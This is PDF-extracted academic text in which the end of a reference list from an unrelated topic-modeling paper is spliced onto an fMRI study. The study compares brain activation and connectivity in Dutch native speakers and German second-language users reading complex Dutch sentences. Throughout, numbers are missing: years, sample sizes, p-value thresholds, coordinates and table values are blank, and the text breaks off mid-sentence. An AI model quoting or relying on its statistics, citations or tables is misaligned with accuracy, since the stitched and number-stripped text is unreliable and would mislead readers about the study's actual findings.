mosenzon, noam slonim, and naftali tishby. . multivariate information bottleneck. in proceedings of the seventeenth conference on uncer- tainty in artificial intelligence, pages – . thomas l. griffiths, michael i. jordan, joshua b. tenen- baum, and david m. blei. . hierarchical topic models and the nested chinese restaurant process. in advances in neural information processing systems, pages – . yoni halpern, youngduck choi, steven horng, and david sontag. . using anchors to estimate clini- cal state without labeled data. in amia annual sympo- sium proceedings. american medical informatics as- sociation. yoni halpern, steven horng, and david sontag. . anchored discrete factor analysis. arxiv preprint arxiv: . . nathan hodas, greg ver steeg, joshua harrison, satish chikkagoudar, eric bell, and courtney corley. . disentangling the lexicons of disaster response in twitter. in the rd international workshop on social web for disaster management (swdm’ ). matthew d. hoffman, david m. blei, chong wang, and john paisley. . stochastic variational inference. journal of machine learning research, ( ): – . thomas hofmann. . probabilistic latent semantic analysis. in proceedings of the fifteenth conference on uncertainty in artificial intelligence, pages – . jagadeesh jagarlamudi, hal daumé iii, and raghaven- dra udupa. . incorporating lexical priors into topic models. in proceedings of the th conference of the european chapter of the association for com- putational linguistics, pages – . association for computational linguistics. moontae lee and david mimno. . low- dimensional embeddings for interpretable anchor- based topic inference. in proceedings of empiri- cal methods in natural language processing, pages – . moshe lichman. . uc irvine machine learning repository. jon d. mcauliffe and david m. blei. . supervised topic models. in advances in neural information pro- cessing systems, pages – . shike mei, jun zhu, and jerry zhu. . robust reg- bayes: selectively incorporating first-order logic do- main knowledge into bayesian models. in proceed- ings of the st international conference on machine learning (icml- ), pages – . david mimno, hanna m. wallach, edmund talley, miriam leenders, and andrew mccallum. . op- timizing semantic coherence in topic models. in pro- ceedings of the conference on empirical methods in natural language processing, pages – . asso- ciation for computational linguistics. thang nguyen, yuening hu, and jordan l. boyd-graber. . anchors regularized: adding robustness and extensibility to scalable topic-modeling algorithms. in proceedings of the association of computational lin- guistics, pages – . thang nguyen, jordan boyd-graber, jeffrey lund, kevin seppi, and eric ringger. . is your anchor going up or down? fast and accurate supervised topic models. in proceedings of north american chapter of the association for computational linguistics. fabian pedregosa, gaël varoquaux, alexandre gram- fort, vincent michel, bertrand thirion, oliver grisel, mathieu blondel, peter prettenhofer, ron weiss, vin- cent dubourg, jake vanderplas, alexandre passos, david cournapeau, matthieu brucher, matthieu per- rot, and édouard duchesnay. . scikit-learn: ma- chine learning in python. journal of machine learn- ing research, : – . radim řehůřek and petr sojka. . software frame- work for topic modeling with large corpora. in pro- ceedings of the lrec workshop on new chal- lenges for nlp frameworks, pages – . kyle reing, david c. kale, greg ver steeg, and aram galstyan. . toward interpretable topic discovery via anchored correlation explanation. icml workshop on human interpretability in machine learning. michal rosen-zvi, thomas griffiths, mark steyvers, and padhraic smyth. . the author-topic model for au- thors and documents. in proceedings of the th con- ference on uncertainty in artificial intelligence, pages – . jian tang, zhaoshi meng, xuanlong nguyen, qiaozhu mei, and ming zhang. . understanding the limit- ing factors of topic modeling via posterior contraction analysis. in proceedings of the international confer- ence on machine learning, pages – . naftali tishby, fernando c. pereira, and william bialek. . the information bottleneck method. in pro- ceedings of th annual allerton conference on com- munication, control and computing, pages – . greg ver steeg and aram galstyan. . discovering structure in high-dimensional data through correlation explanation. in advances in neural information pro- cessing systems, pages – . greg ver steeg and aram galstyan. . maxi- mally informative hierarchical representations of high- dimensional data. in artificial intelligence and statis- tics, pages – . brain- - -ver -weber_ p .. overlap and differences in brain networks underlying the processing of complex sentence structures in second language users compared with native speakers kirsten weber, , lisa luther, peter indefrey, , and peter hagoort , abstract when we learn a second language later in life, do we integrate it with the established neural networks in place for the first language or is at least a partially new network recruited? while there is evidence that simple grammatical structures in a second language share a system with the native language, the story becomes more multifaceted for complex sentence structures. in this study, we investigated the underlying brain networks in native speakers com- pared with proficient second language users while processing complex sentences. as hypothesized, complex structures were processed by the same large-scale inferior frontal and middle temporal language networks of the brain in the second language, as seen in native speakers. these effects were seen both in activations and task-related connectivity patterns. furthermore, the second language users showed increased task-related con- nectivity from inferior frontal to inferior parietal regions of the brain, regions related to attention and cognitive control, suggesting less automatic processing for these structures in a second language. key words: activation; bilingualism; connectivity; fmri; language; ppi; syntax introduction when we learn a second language later in life, wealready have an entire first language system in place. there is an established system, a brain network, for process- ing sounds, words, and sentences in this language. as we start learning a second language, it is intuitively plausible that we recruit parts of the same brain network that is already established for the first language. indeed most meta-analysis studies on second language processing in the brain confirm this idea (indefrey, ) at least if participants are proficient in their second language (sebastian et al., ). these stud- ies largely focused on simple sentence structures that overlap in structure with those in the first language. however, we know less about the networks engaged in processing com- plex structures and especially those structures that have no direct correspondents in the first language. a structure that does not exist in the same form in the first language cannot be tested across languages in the same sub- jects. in this study, we therefore compared the processing of complex sentence structures in a group of second language users to a group of native speakers of dutch. we investigated two types of complex sentence structures, one that existed in the first language of the second language user group (a right- branching structure) and one that did not (a crossed depen- dency structure). crossed dependencies (fig. a) are complex sentence structures that are infrequent in their appearance across the languages of the world, dutch and swiss–german being among the few. in standard german, a nested dependency structure would be used instead (fig. c). these sentences look very similar: both have nonlocal dependencies and only the final verbs appear to be swapped. nonetheless, lin- guistically, they belong to different types of syntactic classes (nowak et al., ). the crossed dependency structure is generated by context-sensitive grammars, while the nested dependency structure is generated by the lower class of context-free grammars. psycholinguists have discovered dif- ferences in the processing of these structures (bach et al., ; kaan and vasić, ). however, contrary to the lin- guistic hierarchy, the crossed dependencies appear to be eas- ier to process than the nested dependency structures. therefore, both from a linguistic and a psycholinguistic per- spective, crossed dependency structures are different from nested dependency structures in their syntactic structure, while the meaning conveyed is similar. max planck institute for psycholinguistics, nijmegen, the netherlands. donders centre for cognitive neuroimaging, donders institute for brain, cognition and behaviour, radboud university nijmegen, nijmegen, the netherlands. department of linguistics, heinrich-heine university, duesseldorf, germany. brain connectivity volume , number , ª mary ann liebert, inc. doi: . /brain. . the processing of crossed dependencies in second lan- guage speakers is thus an interesting test bed to investigate how these later learned complex structures are processed in the brain. right-branching sentence structures (fig. b, d) on the other hand are structures with a similar meaning to the sentences in figure a and c, but with an equivalent structure across the two languages. moreover, while still complex structures, they are thought to be easier to process than embedded structures (stromswold et al., ). while crossed dependencies do not exist in german, ger- man native speakers can nonetheless acquire and understand these structures rapidly, even in adulthood (davidson and indefrey, ; uddén et al., ), as evidenced by behav- ioral and electrophysiological measures. accordingly, one might assume that the same hemodynamic effects should be found whether the structure is processed by a first lan- guage speaker or second language user. in the initial analysis of the present dataset published in weber’s phd thesis ( ), syntactic hemodynamic repetition effects of crossed dependency structures in a first language speaker group were compared with the repetition effects of the same structures in a second language (l ) user group. this analysis showed subtle differences in the repetition ef- fects between the two groups. however, these effects, while different across groups (the native speaker group showed a repetition enhancement effect and not the expected repetition suppression effect, while the german group did not), were not in the expected direction and moreover very subtle, only pres- ent in a region of interest analysis (focusing on the left inferior frontal gyrus and left and right temporal cortex). while this hints at a slightly different organization of the processing systems within the same brain regions, in the pres- ent analysis, we were interested in figuring out whether the overall brain activation patterns and networks differed across the two groups. more specifically, we were interested in dis- covering whether the overall language network was larger in the l user group or whether the networks completely overlap at the whole-brain level. in this article, we thus report a com- plementary classic activation and functional connectivity analysis of this dataset to elucidate whether differences in he- modynamic responses between the two groups are confined to the core regions of the language network or whether the lan- guage network is organized differently for processing the same language as an l or as an l . according to some theories, later learned syntactic struc- tures should at least initially be processed by a different brain network. ullman ( a) proposed that l speakers rely more on a declarative system to process the second lan- guage, while l processing is more procedural. two differ- ent neural networks, that is, a left frontotemporal and a frontostriatal network are proposed to underlie these pro- cesses, respectively (ullman, b). both are claimed to in- volve broca’s area (ullman, ). others propose that while the overall network for gram- matical processing is very similar for the first and second lan- guage, there are activation differences. namely, l speakers engage more regions if the l was acquired later in life and specifically if they are less proficient in the l . this pertains especially to regions related to cognitive control, such as those regions related to suppressing interfering lexical or syntactic representations from the other language (abutalebi et al., ; green and abutalebi, ). other accounts sug- gest differences in the processing of local and nonlocal de- pendencies (clahsen and felser, ; dallas and kaan, ). in case of local dependencies, l grammatical pro- cessing can become native-like. however, the processing of complex syntax, such as nonlocal dependencies, might differ (clahsen and felser, ). yet, others claim that the same brain network processes both the first and the second language (consonni et al., ; indefrey, ; luke et al., ; perani et al., ). as indicated previously, stronger evidence for a shared syntactic system between l and l comes from a repetition suppression study in german–english late bilin- guals (weber and indefrey, ). the study showed that an english passive can be primed by a german passive on both the neural and the behavioral levels. therefore, it was argued that the same neuronal populations were recruited in the processing of the l and the l passive. similar be- havioral effects in language production have been found in spanish–english and dutch–english bilinguals (hartsuiker et al., ; schoonbaert et al., ). most of these studies focused on sentences with simple local dependencies. it is thus an open question whether advanced second language users process these later learned complex structures like na- tive speakers or whether they rely on different processes and representations. in the past, functional neuroimaging studies of language processing have focused on activation studies alone, trying to investigate where a certain cognitive function is localized. however, this approach does not take the dynamic inter- play between regions during cognitive tasks into account fig. . examples of complex sentence structures in german and dutch and the dependencies be- tween verbs and arguments. the structures in (a, b) are used in the present study. the structure in (a) does not exist in standard german and an embedded structure, see (c), is possible instead; (b, d) on the other hand are equivalent in ger- man and dutch. all sentences mean ‘‘jan taught anna to feed the horses.’’ weber et al. (hagoort, ). therefore, investigations of functional, task-related connectivity patterns are an important addition to elucidate the large-scale networks underlying language processing. recent studies have shown the dynamic interplay between inferior frontal and temporal regions during lan- guage processing (den ouden et al., ; griffiths et al., ; snijders et al., ). the left inferior frontal and temporal regions of the brain are thought to form the core network related to sentence and especially syntactic processing as described by several dif- ferent theories (e.g., grodzinsky and friederici, ; hagoort, ) and as evidenced, for example, by syntactic priming studies ( menenti et al., ; segaert et al., ). this functional organization appears to be realized across different languages, in closely related languages such as ger- man and dutch, as well as in less related languages such as japanese, chinese, and hebrew (see e.g., the studies listed in the supplementary materials of a recent meta-analysis of sentence-level processing, hagoort and indefrey, ). in the present study, we are going to investigate the language networks of native speakers and second language users and in- vestigate, with activation and connectivity analyses of func- tional magnetic resonance imaging (fmri) data, whether the networks overlap between the two groups. moreover, we are going to explore whether there are any overall group differ- ences in activation and connectivity patterns and, more specif- ically, whether there are any network differences between the two groups for the processing of crossed dependency struc- tures, the structure that does not exist in the first language of the second language user group (in comparison with the right-branching structure that does occur in both languages). we expect these differences to show up in the form of and increased engagement of the brain networks in l process- ing, in the sense of more activation and more connectivity (either in the form of additional network nodes or stronger connections) within the underlying networks. these differ- ences might occur within the traditional language networks thought to underlie sentence and, in particular, syntactic pro- cessing (i.e., left inferior frontal and left middle temporal cortex), which would indicate differences in the nature of the second language networks, or in other nontraditional re- gions that are, for example, linked to cognitive control mech- anisms on the language network (such as prefrontal or parietal regions of the brain). materials and methods participants we tested dutch native speakers ( females) and german native speakers ( females). four of the german participants (three females) were subsequently excluded as they did not meet our criteria concerning their language background or due to technical malfunction during scanning. one dutch native speaker was excluded from the analyses as the condition triggers were not recorded correctly. the ger- man native speakers all went to university in the nether- lands and had started learning dutch after the age of . they had all passed the dutch nt staatsexamen, a language test that allows university entry and shows a high-proficiency level in dutch. all participants were right-handed and had no history of neurological impairments. they all had normal or corrected-to-normal vision. the participants received course credits or money for their participation in the experiment. all participants gave written informed consent before the study started and the study was conducted according to institu- tional guidelines of the local ethics committee (cmo proto- col region arnhem-nijmegen, the netherlands) and in accordance with the declaration of helsinki. stimuli and experimental design the experimental stimuli consisted of crossed dependency sentences and right-branching structures with similar seman- tic content (fig. a, b). the study was originally designed as a syntactic priming experiment in which crossed dependency structures were primed (syntactic priming trial: prime: crossed dependency structure, target: crossed dependency structure; no syntactic priming trial: prime: right-branching structure, target: crossed dependency structure). this was fully crossed with a verb repetition manipulation. the main verbs used in the sentences were helpen (to help) and leren (to teach) (crossed dependency structures in dutch are re- stricted to a very limited set of main verbs [zwart, ] and we thus used only two). instead of comparing target sentences as in the original analysis, here we look at the orthogonal contrasts of crossed dependency and right-branching prime sentences. given the design, we thus have equal numbers ( ) of crossed depen- dency and right-branching sentences and an even distribution of the two verbs. the original description of the design can be found in weber ( ). moreover, to hide the priming manipulation and make the sentences less predictable, an equivalent amount of passive and active filler trials, as well as right-branching filler trials, was also presented to the par- ticipant interspersed with the priming trials. as a baseline condition, miniblocks of, in total, sentence format conso- nant strings after every sentences were presented as well. four stimulus lists were created. across these stimulus lists, each target occurred in a prime and a no-prime trial and each sentence’s content appeared in the prime as well as target po- sition. each participant was presented with only one of the stimulus lists. the experiment consisted of three experimen- tal sessions; participants had a short break between sessions. right-branching and crossed dependency sentences are not equal in numbers of words as the right-branching sen- tence has an additional word, te (fig. ). moreover, an addi- tional manipulation of the sentences that was originally conceived to ensure that syntactic priming effects cannot be explained by overlap in length between crossed depen- dency sentences, but no overlap with right-branching sen- tences, introduced an additional adjective in the second noun phrase of right-branching sentences (thus making these always words long) as well as in the crossed depen- dency target sentences (thus words long). no additional adjectives were introduced in crossed dependency prime sen- tences; these were thus nine words long. thus, our present comparison between right-branching and crossed dependency structures is confounded by length ( versus words) and additional adjectives in one condi- tion. however, given our hypothesis, we are only interested in the interaction between participant group and type of structure as well as the main difference between groups, con- trasts that should only be affected by this confound between the type of structures if the sentence length per se was pro- cessed differently in the two groups, which is unlikely. brain networks in second language users fmri experimental procedure the experiments were run using presentation software (neurobehavioral systems, www.neuro-bs.com). partic- ipants lay in the scanner and looked at a screen through a mirror. sentences were presented in white arial font of size on a black background and participants were instructed to read the sentences silently in their head. crossed dependency sentences were presented in these fragments: ‘‘de muzikant/ heeft/de tiener/de fluit/leren/spelen’’ (the musician has the teenager the flute teach play.) and right-branching sentences in these: ‘‘de muzikant/heeft/de tiener/geleerd/de fluit/te spelen’’ (the musician has the teenager taught the flute to play.). sentence fragments were presented one by one at a fixed presentation rate that depended on the length of the fragment, both right-branching and crossed dependency sentences were presented in six fragments (while the number of words differed, see previous section). the fragment duration in msec was computed as ([number of letters in the fragment · msec] + msec), a method based on nieuwland and van berkum ( ). during the in- terstimulus interval (between sentences), a fixation cross was displayed. the length of the interval was jittered between . and . sec. in . % of the nontarget experimental sen- tences and one third of the filler sentences, a word appeared in a larger font size; these trials were not included in the current analysis. subjects had to respond to this change by pressing a button. fmri data acquisition and analysis the fmri data were acquired on a . tesla siemens avanto scanner. a functional t *-weighted epi-bold fmri scan was performed (tr = . sec, te = msec), with a flip angle of �. we acquired slices with a voxel size of . · . · mm with a . -mm gap. the field of view was · · . mm. the slices were acquired in an ascending order. it was made sure that the field of view included inferior parts of frontal and temporal cortex. in some subjects, parts of the top of the brain were outside the field of view. the anatomical images were acquired using a t -weighted sequence. the fmri data were prepro- cessed and analyzed at the first level using spm (www.fil.ion.ucl.ac.uk/spm/). second-level analyses were run using spm . the first five images were discarded to ensure that transient nonsaturation effects did not affect the analysis. the functional images were checked for spikes and if any were detected these images were removed and a replacement image was created based on the surrounding images. all functional images were real- igned and slice-time corrected. the participants’ anatomical t images were coregistered to the mean functional image. the anatomical t images were then segmented into gray and white matter and the spatial normalization parameters were taken to normalize the functional images. functional images were smoothed with a -mm full-width at half max- imum gaussian kernel. for the fmri activation analysis, we first defined the con- trasts of interest for each subject. these were then taken to the second level for a random-effects group analysis. con- nectivity analyses were run using the generalized psycho- physiological interaction (gppi) toolbox ( mclaren et al., ). as for the activation analysis, as per psychophysio- logical interaction analysis (thus per seed), we first defined the contrasts of interest for each subject. these were then taken to the second level for a random-effects group analysis. first-level single-subject model activation for the activation analyses, we created a design matrix for each participant that included for each of the three sessions, regressors for each type of sentence structure and the sentence format consonant strings, as well as the fixation cross. the ac- tual event duration was modeled and realignment parameters for movement correction were added to the model. in addition, additional regressors were entered to covary for excessive movement at time points where composite motion was > mm. these covariates were created using the art toolbox ( mozes and whitfield-gabrieli, ; www.nitrc.org/ projects/artifact_detect/). on average, the additional regres- sors were added for < % of the time points. we then defined three different contrasts per subject, the crossed dependency sentences, the right-branching sentences, and both these complex sentence structures, all against the baseline of sen- tence format consonant strings. these contrasts were taken to the second level for a random-effects group analysis. first-level single-subject model connectivity we also carried out task-related connectivity analyses from seeds that were defined based on second-level activa- tion analyses. more specifically, based on the first six peaks of activation from the conjunction of complex sen- tences across the two groups (table ), we defined -mm spheres that were used as seeds for a gppi analysis ( mclaren et al., ). these seeds were located in the left inferior frontal gyrus, left temporal pole, left anterior middle tempo- ral gyrus, left middle temporal gyrus, left posterior middle temporal gyrus, and left inferior temporal gyrus. for each seed region and subject, we built a design matrix consisting of the following regressors: ( ) regressors for each condition, mirroring the activation model; ( ) a regressor for the overall activity in the seed region; and ( ) regressors de- scribing the modulation of activity from the seed region to the rest of the brain for each of the conditions (psychophys- iological interactions). moreover, the same regressors for movement correction as for the activation models were used. the actual event duration was modeled. we again de- fined three different contrasts of interests to be taken into the second-level group analysis: the modulation of activity from the seed region for crossed dependency sentences, right- branching sentences, and both complex sentences against sentence format consonant strings. second-level model activation to investigate overlap and differences in activation pat- terns between the two groups, we built two different second- level models. first, we built a flexible factorial model with the factors group (second language user; native speaker), type of sentences (crossed dependency or right branching), and subject in which we modeled both main effects and the interaction. second, a simple between-groups t-test com- pared complex sentences versus sentence format consonant strings across the two groups. this was built as an additional model to be able to look at the main effect of the group, which is not correctly estimated in the flexible factorial weber et al. table . activation and connectivity effects of the conjunction of sentences versus consonant strings contrast between the two groups region cluster size x/y/z ba area pfwe (cluster) pfwe (peak) t activations left middle temporal gyrus a � � / . . . left middle temporal gyrus (anterior) a � � � . . left medial temporal pole a � � . . left inferior temporal gyrus a � � � . . left middle temporal gyrus (posterior) a � � . . left inferior frontal gyrus orbitalis/triangularis a � � / . . left hippocampus � � � . . left fusiform gyrus � � � . . left rolandic operculum � . . left inferior frontal gyrus triangularis � . . left superior temporal gyrus � � . . left insula � � . . right middle temporal gyrus � . . . right middle temporal pole � . . right middle/superior temporal gyrus � � . . right (para)hippocampal gyrus � � . . . left cerebellum � � . . . left precentral gyrus � � . . . left calcarine gyrus � � . . . cuneus � . . right cerebellum � � . . . right precentral gyrus � . . . ( ) connectivity from left inferior frontal gyrus left anterior superior temporal gyrus/left temporal pole � � . . . left inferior occipital gyrus � � � . . . right inferior frontal cortex/insula . . . left fusiform gyrus � � � . . . ( ) connectivity from left temporal pole cerebellar vermis (lobule vi) � � . . . left lingual gyrus � � � . . ( ) connectivity from left anterior temporal gyrus right inferior frontal gyrus (opercularis) . b . . left middle temporal gyrus � � . b . . left fusiform gyrus � � � . b . . left middle occipital gyrus � � . . left lingual gyrus � � � . . left superior occipital gyrus � � . b . . right superior occipital gyrus � . b . . right inferior occipital gyrus � . . right middle occipital gyrus � . . right inferior occipital gyrus � � . . left fusiform gyrus � � . . left anterior/middle cingulate cortex � . b . . right cerebellum � � . . . left inferior frontal gyrus (orbitalis) � � . . . ( ) left middle temporal gyrus left anterior middle temporal gyrus � � � / . b . . ( ) left posterior middle temporal gyrus left inferior parietal cortex � � . . . right middle temporal gyrus � . b . . right middle occipital gyrus � . . left fusiform gyrus � � � . b . . left hippocampus � � . . . left middle occipital gyrus � � . b . . left inferior occipital gyrus � � � . . right hippocampus � . . . left middle occipital gyrus � � . . . ( ) left inferior temporal gyrus n.s. effects are reported at a peak-level threshold of p < . uncorrected, pfwe < . at the cluster level, and all peaks within a cluster > mm apart. a indicates that this peak was taken as a seed for the connectivity analysis. b ppi results that survive a more stringent cluster-level-corrected threshold of pfwe < . (to control for the six different seeds investigated). ba, brodman area; fwe, family-wise error; n.s., not significant; ppi, psychophysiological interaction. design. we then looked at the following contrasts: (a) the common patterns of activation for second language users and native speakers for complex sentences versus sentence format consonant strings as revealed by a conjunction be- tween the group contrasts; (b) the differences between the two groups in processing complex sentences versus sentence format consonant strings; (c) the interaction between type of sentence structure and group. the conjunction analysis was performed using spms of the minimum t-statistic over two orthogonal contrasts. inference was based on p-values adjusted for the search volume using the random field theory (friston et al., ). second-level model connectivity for the second-level connectivity analysis, we built similar models. for each seed region, we built both a sim- ple between-groups t-test and a flexible factorial model. these modeled the same conditions as for the activa- tion analysis, but on the psychophysiological interaction regressors. for the activation as well as the connectivity analyses, we report whole-brain effects at a conservative voxel- level threshold of p < . , family-wise error (fwe) cor- rected at the cluster level for multiple comparisons ( p < . ). as we conduct connectivity analyses for six different seed regions, we also report which cluster-level p-values survive a stricter cluster-level threshold of pfwe < . (tables and ). all reported coordinates are in montreal neurological institute space. results performance behavioral task participants were attending to the sentences as evidenced by the performance on the behavioral task. the german na- tive speaker group spotted % (standard deviation [sd] = %) of target items in larger font size and the dutch native speaker group % (sd = %). activation (a) conjunction (common pattern of activation across groups): the two-participant groups showed common patterns of activation for complex sentences versus consonant strings across widespread areas of a typical language network (fig. and table ), including left and right middle temporal cortices (on the left from very posterior parts of the temporal cortex close to oc- cipital areas all the way to the anterior temporal pole; on the right in more anterior regions only), left inferior frontal gyrus, as well as left pre/postcentral gyrus, and left and right hippocampus. (b) main effect of group: there were no differences be- tween the two groups in their activation patterns for complex sentences versus consonant strings. (c) the interaction between type of sentence structure and group: there were no differences in the processing of the two types of sentence structures between the two groups. connectivity seed in the left inferior frontal gyrus (a) conjunction (common pattern of activation across groups): the task-related functional connectivity analysis from the seed in left inferior frontal gyrus showed enhanced connectivity to left occipital cortex table . activation and connectivity effects for the main effect of group region cluster size x/y/z ba area pfwe (cluster) pfwe (peak) t activations n.s. ( ) ppi from seed in left inferior frontal gyrus left intraparietal sulcus � � < . a . . left precentral gyrus � � . . . left supramarginal gyrus � � / . . . left middle occipital gyrus extending into the left intraparietal sulcus � � . a . . left thalamus � � . . . ( – ) ppi from seeds in left temporal pole, left anterior, and middle temporal lobe n.s. ( ) ppi from seed in left posterior superior/middle temporal gyrus left intraparietal sulcus � � . . . ( ) ppi from seed in left inferior temporal gyrus n.s. in all cases, the second language user group > native speaker group, no significant effects for the reverse contrast. effects are reported at a peak-level threshold of p < . uncorrected, pfwe < . at the cluster level, and all peaks within a cluster > mm apart. a ppi results that survive a more stringent cluster-level-corrected threshold of pfwe < . (to control for the six different seeds investigated). we used this conservative threshold as the current analysis is a reanalysis of a dataset. however, we want to note that no additional group differences in the activation or connectivity analyses appear at a less conservative voxel-level threshold of p < . , fwe ( p < . ) corrected at the cluster level. weber et al. and left anterior temporal cortex and right inferior frontal cortex for complex sentences compared with consonant strings for both groups, but these effects did not survive the stricter cluster-level threshold of pfwe < . (fig. and table ). (b) main effect of group: the second language user group additionally showed enhanced connectivity to left in- ferior parietal regions and the left middle occipital gyrus (fig. and table ), additional group differ- ences in the left precentral gyrus, left supramarginal gyrus, and the left thalamus did not survive the stricter cluster-level threshold of pfwe < . . (c) the interaction between type of sentence structure and group: there were no interaction effects. seed in the left temporal pole (a) conjunction (common pattern of activation across groups): the task-related functional connectivity analysis from the seed in the left temporal pole showed enhanced connectivity to the lingual gyrus and the cerebellum for complex sentences compared with consonant strings for both groups. these effects did not survive the stricter cluster-level threshold of pfwe < . (table ). (b) main effect of group: there were no differences be- tween the groups. (c) the interaction between type of sentence structure and group: there were no interaction effects. seed in left anterior middle/superior temporal gyrus (a) conjunction (common pattern of activation across groups): the task-related functional connectivity anal- ysis from the seed in the left anterior temporal lobe showed enhanced connectivity to regions of the lan- guage network from inferior frontal gyrus to posterior temporal cortex as well as occipital cortex gyrus for complex sentences compared with consonant strings for both groups. most of these connectivity effects sur- vived the stricter threshold (table and fig. ). (b) main effect of group: there were no differences be- tween the groups. (c) the interaction between type of sentence structure and group: there were no interaction effects. seed in left middle/superior temporal gyrus (a) conjunction (common pattern of activation across groups): the seed in left middle temporal gyrus was coupled to a slightly more anterior left middle temporal region for sentences compared with sentence format consonant strings for both groups (table and fig. ). (b) main effect of group: there were no differences be- tween the groups. (c) the interaction between type of sentence structure and group: there were no interaction effects. seed in left posterior middle/superior temporal gyrus (a) conjunction (common pattern of activation across groups): enhanced connectivity to sentences com- pared with consonant strings from a seed in left poste- rior temporal gyrus was found in the left angular gyrus, right inferior temporal gyrus, and the left fusi- form for both groups. additional effects in the occip- ital gyrus and bilateral hippocampi did not survive the stricter cluster-level threshold of pfwe < . . fig. . conjunction of patterns of activation across the two groups for the contrast of sentences versus consonant strings, voxel-level threshold p < . uncorrected, cluster-level threshold pfwe < . (table shows which of these psychophys- iological interaction [ppi] effects survive a more stringent pfwe < . cluster-level threshold to correct for number of seeds investigated). bar graphs of contrast values with % confidence intervals of representative peaks are provided for illustra- tion purposes. fwe, family-wise error. color images available online at www.liebertpub.com/brain brain networks in second language users fig. . shared patterns of task-related connectivity across the two groups: conjunction of psychophysiological interactions from seeds in lifg, latg, lmtg, and lptg (seeds shown in blue), defined based on peaks in the activation analysis, see fig- ure across the two groups for the contrast of sentences versus consonant strings, voxel-level threshold p < . uncorrected, and cluster-level threshold pfwe < . (table shows which of these ppi effects survive a more stringent pfwe < . cluster-level threshold to correct for number of seeds investigated). bar graphs of contrast values with % confidence intervals of represen- tative peaks are provided for illustration purposes. latg, left anterior temporal gyrus; lmtg, left middle temporal gyrus; lifg, left inferior frontal gyrus; lptg, left posterior temporal gyrus. color images available online at www.liebertpub.com/brain fig. . main effect of group (german native speaker group > dutch native speaker group) of the psychophysiological interactions from seeds in lifg and lptg (shown in blue) for the contrast of sentences versus consonant strings, voxel-level threshold p < . uncorrected, and cluster-level threshold pfwe < . (table shows which of these ppi effects survive a more stringent pfwe < . cluster-level threshold to correct for number of seeds investigated). bar graphs of contrast values with % confidence in- tervals of representative peaks are provided for illustration purposes. color images available online at www.liebertpub.com/brain (b) main effect of group: the second language user group additionally showed enhanced connectivity to a left inferior parietal region, which did not survive the stricter threshold of pfwe < . (fig. and table ). (c) the interaction between type of sentence structure and group: there were no interaction effects. seed in left inferior temporal gyrus. there were no signif- icant connectivity effects for this seed. discussion summary of the results in this study, we investigated the processing of complex dutch sentences in an activation and connectivity fmri study. we compared the brain networks of a group of dutch native speakers and a group of german native speak- ers with dutch as their second language during sentence pro- cessing. the experiments revealed the following: ( ) activation and connectivity patterns to process com- plex sentences overlapped between native speakers and second language users, as revealed by conjunction analyses. ( ) the second language user group showed some addi- tional connectivity patterns, involving areas outside the traditional language network, that is, inferior pari- etal regions. connectivity and activation in the language network the current study revealed a large network of regions sim- ilar to those shown before for native (den ouden et al., ; griffiths et al., ; snijders et al., , ) and second language processing (weber and indefrey, ) for similar manipulations for simpler sentences. as expected, the core of these networks resides in the left middle temporal and infe- rior frontal cortex. in the context of sentence-level processing, these are thought to be linked to key language processing functions, namely the access to the relevant building blocks such as words, from memory and the unification of these into a coherent message-level representation both on the se- mantic and syntactic levels, respectively (hagoort, , ; tyler et al., ). not surprisingly, these areas also show enhanced connectivity during sentence processing as they have to work in consort during online processing. anatomically, these frontal and temporal areas of the lan- guage network are connected by several fiber bundles, such as the arcuate fasciculus, connecting the inferior frontal cor- tex with parts of the posterior temporal cortex, and the unci- nate, connecting frontal cortex and anterior temporal cortex (friederici and gierhan, ; hagoort, ). in addition to the key network on the left, we found additional activa- tions in the right temporal gyrus. while not typically in- volved, for example, in syntactic processing (segaert et al., ), one should keep in mind that in this study we are in- vestigating a broad contrast of (complex) sentences versus sentence format consonant strings, which thus incorporates all kinds of levels of language processing (sentence and word-level syntax and semantics, lexical processing, and control processes), which do engage these areas (hagoort, ). the involvement of a large network of areas, includ- ing those outside of left inferior frontal and temporal gyrus, is thus not surprising. both for the activation and the connectivity analyses, the vast overlap between these language networks for second language users and native speakers is evident. thus, even for highly complex and even previously unknown sentence structures, the main processing network for a second lan- guage seems to be shared with that of a native language at least at the high-proficiency level of the present l user group. this also supports the electrophysiological findings by davidson and indefrey ( ), which showed that these structures can be learned quickly. this also mirrors previous findings in the literature for simpler sentence structures (indefrey, ; luke et al., ; perani et al., ; weber and indefrey, ) and provides evidence against ideas that a second language is processed by a fundamentally different brain network. less automatic processing in second language users several areas showed increased connectivity patterns in the second language user group for processing complex sentence structures compared with the native speakers. this suggests that some additional or different mechanisms are at play to process complex sentences in a non-native language. the in- crease in connectivity in this group from left inferior frontal gyrus and less strongly from left posterior temporal gyrus to inferior parietal regions could potentially stem from increased cognitive demands on the multidemand and control system (duncan, ; humphreys and lambon ralph, ) when processing a second language. the observation that pro- cessing a second language, even at a high-proficiency level, could lead to increased demands on cognitive control mech- anisms has been claimed before (abutalebi et al., ; green and abutalebi, ). this suggests that there are no differ- ences in the organization of the core language machinery itself, which appears to be shared between a first and a sec- ond language just as previous research suggests (weber and indefrey, ). the differences arise in the increased demands on systems that act on the core language processing system to ensure that the task demands (efficiently parsing the sentence and get- ting to a coherent message level representation) are met. these cognitive demands increase when processing a second lan- guage and the result is an increase in connectivity in the fron- toparietal network related to top-down cognitive control and attention, as well as executive semantic decisions (humphreys and lambon ralph, ). specifically, the connectivity dif- ferences seem to be involving the left intraparietal sulcus part close to the angular gyrus, which a recent meta-analysis in which high- versus low-demand semantic tasks were con- trasted had also found (noonan et al., ) and linked to domain-general executive control demands. generally, our findings seem to indicate that the core lan- guage machinery is shared between native and second lan- guage user groups, even when processing highly complex structures that do not exist in the l users’ native language. with an increase in cognitive control, these areas can handle second language structures as effectively as an l group. the differences in brain networks are thus only in peripheral areas related to cognitive control, which are influencing the core network. we thus find no evidence for a fundamental brain networks in second language users distinction between first and second language processing, as in more procedural versus declarative processing as claimed by ullman ( a,b) or a specific difference in grammatical processing of nonlocal dependencies in a second language (clahsen and felser, ). no specific group differences for later learned structures next to investigating general differences between lan- guage processing in native speakers and second language users, we wanted to see whether there are any specific pro- cessing differences related to later learned structures that cannot be easily mapped on an existing structure from the na- tive language. at the current conservative statistical thresh- olds, we do not see any such differences indicating that later learned sentence structure can also be integrated into existing language networks in the brain. there is thus no con- crete evidence with this analysis for different language mechanisms in processing these later learned sentence struc- tures. however, subtle difference in organization within these overlapping language networks that were indicated by the repetition effects analysis of the same dataset (see weber’s ( ) phd thesis) should be further investigated in future studies. furthermore, future investigations should see whether the current results hold under different task con- ditions, for example, when sentence comprehension ques- tions are asked, as well as for other, less 